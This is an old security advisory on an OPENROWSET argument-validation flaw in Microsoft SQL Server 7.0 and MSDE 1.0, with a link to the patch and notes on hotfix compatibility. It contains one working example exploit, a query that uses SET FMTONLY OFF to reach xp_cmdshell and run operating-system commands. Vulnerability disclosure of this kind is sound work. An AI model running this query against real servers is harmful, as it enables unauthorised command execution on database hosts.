COMMAND
MS SQL
SYSTEMS AFFECTED
Microsoft SQL Server Version 7.0 and Microsoft Data Engine (MSDE) 1.0
PROBLEM
Following was found by Sven Hammesfahr and info is based on a
Security Bulletin. Microsoft SQL Server 7.0 and MSDE 1.0
perform incomplete argument validation on certain classes of
remotely submitted SQL statements. If a user is able to submit a
particular form of a SQL Select statement to SQL Server or MSDE,
it is possible to take actions on the SQL data base or, if the SQL
Server or MDSE is operating in an account with elevated privileges
on the underlying system, on the underlying operating system
itself.
In order to exploit this vulnerability, a user would have to have
the right to submit queries to the SQL Server or MSDE via ODBC,
OLE DB, or DB-Library and be logged on using SQL Server Security.
The user would not require any special privileges beyond the
right to submit SQL queries.
There's description of the vulnerability by Sven Hammesfahr. The
detailed description is on his website at:
http://itrain.de/sql/knowhow/security/openrowsete.htm
Also, the "little trick" he refers to is in the addition of SET
FMTONLY OFF before the execute statement to keep the query from
returning metadata only. An example exploit would be:
SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data
Source=myserver','SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')
Test your servers ASAP to keep from becoming a statistic...
SOLUTION
Patch availability:
http://www.microsoft.com/downloads/release.asp?ReleaseID=19132
Fyi, for those of you installing the SP2 BETA (or have already),
this hotfix will not work with the SQL7 SP2 Beta release. The
ums.dll does not have functions that the patched sqlservr.exe
requires. It's understandable, but MS doesn't make it known to
the user that a higher version SP will/should not work with a
lower version hotfix. Only tested on NT4 SP5.